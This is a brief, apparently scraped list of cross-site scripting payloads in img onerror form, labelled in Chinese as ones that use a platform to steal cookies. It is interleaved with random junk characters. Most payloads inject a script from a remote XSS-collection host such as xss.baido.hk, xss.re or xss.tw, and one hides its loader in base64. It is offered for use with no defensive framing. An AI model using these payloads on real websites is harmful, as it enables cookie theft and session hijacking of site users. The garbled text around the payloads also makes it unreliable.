<img src='non-exist.jpg'onerror="alert('xss')">, H1 e* @1 ~, u" U4 D
<img src=# onerror=alert(123)>
+ Q" {1 Q; M7 b4 Q c<img src=# onerror=alert(document.cookie)>: a" _0 r \" ]" x! R! r3 x' l
下面是利用平台钓cookie的
) ?6 U, A( D+ U3 V( h$ C! M <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>, f5 M" u6 Y/ i h
0 y4 ~2 ?. F- r, ?2 o. v3 `. i3 M" R' x7 m5 f0 p. s
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>( L @: j2 A4 G& m- u
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>+ k/ t6 W% @4 [* L2 Y
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>! T8 R% }: k0 i6 C4 ? N( T. m& u
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
5 [( N' d. q: h- `<img src="#">) c3 S9 q! Z7 q# p
<img src="#">
; z! e8 W0 T( @# A3 M% ~<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
1 a" ^! a8 _# u2 F# O<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
M9 W& B( ^/ }: v! y6 G9 t5 I<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))> g/ k: k: }: z# q" v7 q8 S
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>0 s. u/ w7 ^4 Z+ g
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>' t6 S0 ~7 }& x. S7 V4 V! e
<img src=x width="0" height="0"></img>& B; l) ^1 t$ S
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>4 J! B. O" B- T3 ^ }: M; h
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>; i6 f7 U0 P/ E
|